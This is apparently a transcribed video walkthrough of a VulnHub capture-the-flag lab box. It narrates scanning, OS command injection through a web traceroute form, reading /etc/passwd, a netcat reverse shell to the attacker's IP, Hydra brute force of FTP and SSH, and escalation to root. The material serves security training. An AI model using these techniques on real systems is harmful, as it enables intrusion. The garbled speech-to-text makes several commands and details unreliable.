Welcome back guys. So today we will be exploiting Ridiculously box from VulnHub. It is being recommended by T-Channel in its Netflix focus trophy room. So Ridiculously is a very interesting box. It's a box where we have to find flags from different places, and in total we have to achieve 130 points. So let's start first by discovering the IP address. Yeah. Okay, my fault. So the box is being breached with my Kali Linux machine, and it's a virtual, as the Kali Linux is hosted in VirtualBox. Here we have got the IP address. It's 192.168.0.12. Let's have an nmap scan. So nmap automator is a script which basically scans all the TCP UDP ports, even the vulnerable. It also scans the scripts. So we will be maintaining a basic notepad, which for note taking I will be using the text editor, which helps us to keep notes of the findings which you have in the boxes. So let's copy the ports. Okay, let me increase the font size. Okay, so we have 21, which is FTP port, 22 is for SSH, 80 having a web server hosted, and on 90 we have something called as SUSE admin. Okay, so let's start first enumerating the FTP port. The FTP port, let us check if the anonymous login is allowed. Yes, the anonymous login has been allowed. Cool, so we have anonymously logged into the FTP port. Let's see what we have. So yes, we got something like flag.txt file and a pop. Okay, so let's read what's there in flag.txt. So it's an invalid command. Let's get that file into it on our go to the directory of ridiculously, yes, and let's move the file flag.txt. Okay, so let's see what we have. Oh, this is unexpected. Cool, we have achieved our first flag. Let's copy and paste it into the nice. So there's another file which is of pub. Let's extract that too. Failed to open the file. Okay, so we have successfully got the first flag. Let's go for another port. Second is 22 SSH. We don't have any password and username, so let's go for 80, which is hosting a web server on it. So .12. Okay, so the mod is cool website. It is not finished yet. Stop judging me. Cool. So let's see the source code if we find something interesting. I don't see something. Okay, let's move on to the nmap scan and see what all things we have. So connected to FTP. Okay, cool. So we have some other ports also discovered by nmap. Let's copy that and paste it into in our note. Okay. Apache server. It is hosted on Apache Fedora Unix. Okay, so let's brute force a directory by Dowbuster. I'll be using the default word list present in the Kali Linux. It's user share, it's in the directory user share word list. Yeah, it's here. Then Dowbuster and directly list 2.3. I would be turning off the be recursive and let's start. Okay, so we have something called icons. Let us see what all results we got. Nice, we found something like interesting called password, which has a flag.txt too. Let's have a look at it. Pass PSSW. Oh, passwords. Yeah. So we have a passwords directory which has got a flag. Yeah. Flag yeah d hyphen just 2 into bit. Okay. And a passwords.html file. Let's paste the password first. I mean the flag. Sorry. So we have achieved 20 points till now. And there's something interesting written here. Wow, Morty clear, really clever, storing password in a file called password. Oh, there's a password. So we found a password in passwords.html that was a bit easy, but we don't know the username. Okay, so let's store that password into a file. Nano password window. Yeah. Okay. So I think we have enumerated both the directory's passwords. Let's see any other directory which we have got. It's icons. Let's see. Oh, it's a bunch of PNG and GIF file. Let's see what. Okay, so these are the basic icons, which I don't think it's somewhat interesting, where we can find something like password. No more T. No. So let's have a look if we have robots. .txt file. Yes. So we have something like CGI bin root shell. How would we hope that it gives us something cool? It's under construction. Let me see the source code. Haha, I'm sorry, Mota, it's a bummer. Oh, it was just a. Let's see into another directory. Enter an IP address to trace. Let me enter. So this is the IP address of my Kali Linux machine, and yes, it is executing a command of trace. So let me try to execute command OS command injection if it's possible, and it's yes. So we have got the ID number of Apache context system. Okay, so who am I? It's Apache server. Do it have NC? Yeah, it is having NC connection. Let us read the cat etc password file, but let me see which directory we are right now. Okay, so we have to shift 3 directories backward. Cat plus 1 2 and 3. Yeah, it's correct. Now etc hyphen password. Oh, it's really a cat, so they are but smart and sanitize the word cat. So let me read the head of it. Cool, it is being not sanitized. Let us store into the answer directory. Yeah, and let me get the tail of it. Okay, so we have got the head and tail of the file. I don't think like we are missing something. Let me full screen it. Yes, so there are Summer, Morty and Rick. These are the 3 users. Apache is a web server hosted. Okay, so I think we have got all the full etc password file. Let us make a note of the users which we have got. It's Rick, Summer and Morty. Yes, let's save it. So we have a password file and a username. So let's try to brute force using Hydra. Wait a second. Before moving on towards the brute force, let us see with our nc plus execute bin bash plus 192.168.0.10 and the port number 444. Let's start a reverse shell nc hyphen lvp. Just listening. Yes, cool, we achieved a reverse shell connection. So let us see what we can. Okay, so we are not able to traverse backwards to a directory. Okay, yeah, let's see what we have in the home directory. I think they have restricted some of the actions as we are not able to see the contents. So let's see. I think it's a let's try brute forcing the FTP connection. Hydra hyphen L user hyphen fpop password file FTP 168.0.12. Yes, cool, we have achieved summer and winter. So let's take a note. FTP credential summer and winter. So summer is the password, username, and winter is the password for FTP connection. SU summer winter. Cool. We have a flag. Let's get it. So the main objective of the box is to search for the flag.txt as it would lead you towards the root. So copy that flag to the directory of our VulnHub ridiculously ls get off the high road somehow. So I think this flag we have not got earlier. Yes. So we have got 30 points till now and 100 more we need. So nice. So we got something from the FTP connection. Control Z. Okay, so let us move on to another port. It's 9090. Let's see what it has for us. Well, okay, so there's one more flag which we have got. It's great finding flags. So none of the flag has been repeated, so we have till now 40. Let's see at the source code. There may be any flag. Flag dot. Okay, so there's only a flag here. Cool. So let's say username. Let's enter summer. Admin. Let's move on to the another port, which is 1337. 1337. 337. Wow, they found my backdoor Morty. So that's great. Each port has something for us. Now let's move on to its 22. I think it's a SSH port. Yeah, it's an SSH port, so let's go for 60,000. Okay, let's NC it. NC 192.168.0.12. of ls cat flag.txt. Cool. So here's our, I think it's our fifth flag. 1 2 3 4 5 6. So we have successfully achieved 6 flags here, which brings 260 points. Nice. So this is a reverse shell ID. Who am I? Root. Nice. So let me traverse to permission denied. So welcome to Rick's half baked shell. Okay, so it's a half. We don't have full permissions here. Let's exit. And so we had achieved a credential summer and winter. So let us try executing SSH port, connecting SSH port using this credentials. 12 port number 1 2 3 4. I think it's 5. Yes, winter. Nice. So we have entered into, we have successfully connected the SSH port. Now let's see what all rights does Summer have. Sorry, user Summer may not run sudo on the local host. Okay, then do we have, let's see, in the home directory there are 3 users: Morty, Rick Sanchez and Summer. I would calling this as Rick. So let's see what we have in Morty. Okay, there are 2 files. It's one is a JPG file and another is a zip file. Let's unzip journal.txt. Okay, it's asking a password. Winter. Oops, it's not correct. So we need to have a look. So let us get both the files. Python. Let's get both the file on our local host. Python -m 8080 wget 12. Let us copy the name and another is save password.jpg. Okay, so we have got both the file here. Let's have a look what all. Bash history, bash profile. Okay, so let's move on to another user. It's Rick. Okay, there are 2 directories. Safe. So what's the file type of safe? Okay, it's an ELF executable file. Let's execute it. Executable permissions are not been given. Operation not permitted. Okay, so let's see what all permissions. Okay, so we are not able, we don't have the permission to execute the file, but we can get that file at our let's get that file our local server. Okay, so we have got save file here, and let's move to another directory. This does not contain any flags. Okay, let's see, do you really does not contain any flag? Let's get that file also. You totally fell for it. Okay, yeah, it does not say contain flag. Let's move to the user Summer. It has a flag for us. Let us get that flag on our local machine. txt1. Okay, so I think this flag we have already got. Yeah, get off the high road Sama. Okay, so it's the same flag. Do you have something else for us? No. Okay, so there's a bunch of things we have achieved from the users. So let's read the file. Strings save password.jpg. Does it contain any flag type? Okay, it's a JFI. The save password file password is okay, so it has prompted something, a password for. So let's take a note. Password for channel is MEESEEK. Music. Okay, so let's unzip that file. Cool, so we have successfully unzipped the file and it has some text and a flag too. Let's copy that flag. Okay, nice. So today Rick told me you'd secret. He had finished its flask commercial, or maybe it was a safe password, was a password that was a safe, or a password was. So there's a bit confusing words, but it is continuously prompting towards save file, I think so. See, yeah. So let us execute the save file which we had got from user Rick. Past Rick to present Rick, tell future Rick to use goddamn command line arguments. Okay, so if you are facing any issue executing the save file even after giving its executable conditions, the error would be of mycrypt. Kindly update your Kali Linux machine, or you can just execute sudo apt get install mycrypt and it could be successfully run. You can execute it successfully. So let us try with the flag which we got, and yes, we have got another flag of 20 points. Let's paste into it. So it's the total score till now. It's 20, 40, 50, 60, 70, 80, 90, 100. So we just need only 30 points right now, and I think we are very close to the root. So here it's a Rick's password, hence then this in case I forgot. So there is a pattern given here. The password for Rick's, it may be one uppercase, one digit, one of the words in my old band name. Okay, so let us see what's the old band name for of Rick. From band by Rick, Postman and dissolved prior to the Flash Curtains. This is the old band name of Rick. So we need to first generate a word list. It's an old band name. Okay, cool. So let's generate a so I will be using mask processor. It's a bit quite simple to generate if you have got a specific pattern, and it would help you generate uppercase, lower. See, I got mp64 -h. So these are the commands which we can use, like $L for lowercase, uppercase digits, special characters, all, and it's for hex. Okay, so we have got a pattern like MP64. Then we want one uppercase $U, one digit, and the word from the band name curtains, curtins, curtains, yeah, and store it into word list. Let me see, like we have nano word list. Yes, one uppercase, one digit, and a band, old band name. So another is flash. Oops, I just misplaced one capital character. We need to, you need to be a bit careful about the case and capital characters, as it's a case sensitive. Okay, that's nice. Nano word list. Yes, that's good. And another is the, so let us see how much words we have got. Oh, that's great. So we'll be using Hydra for brute forcing the, okay, so first we need to make a bit change. Nano user Rick root. Okay, so let's use Hydra. So we're brute forcing the SSH connection on the port 222 -L user -v capital P for word list -p, sorry, -s for specific port. Yeah, that's good. IP address of the machine and service, and threads I would be giving like 5 around. It's great. The attack has started. Let's wait for the results to get. So after a long wait, we have achieved the password and the username. Let's, okay, let's go to Rick, and the password is P7 curtains. Nice, so we have successfully enumerated the user as Rick. So let us see what all sudo rights Rick has got. Okay, matching entries for Rick. So user Rick can execute sudo all sudo commands. So let's execute sudo su, and great, we are in the root. We are as a root, and we have, who am I? Let us check the root directory. It has a cat flat.txt, still same. Let us get that flag on python-m simple http server 8080. Let's stop the brute forcing. wget http 192.168.0.12 port number 8080 flag.txt file. get C2. Nice. So we have got our last 30 points, and by this we have routed the box successfully. Thanks for watching, guys.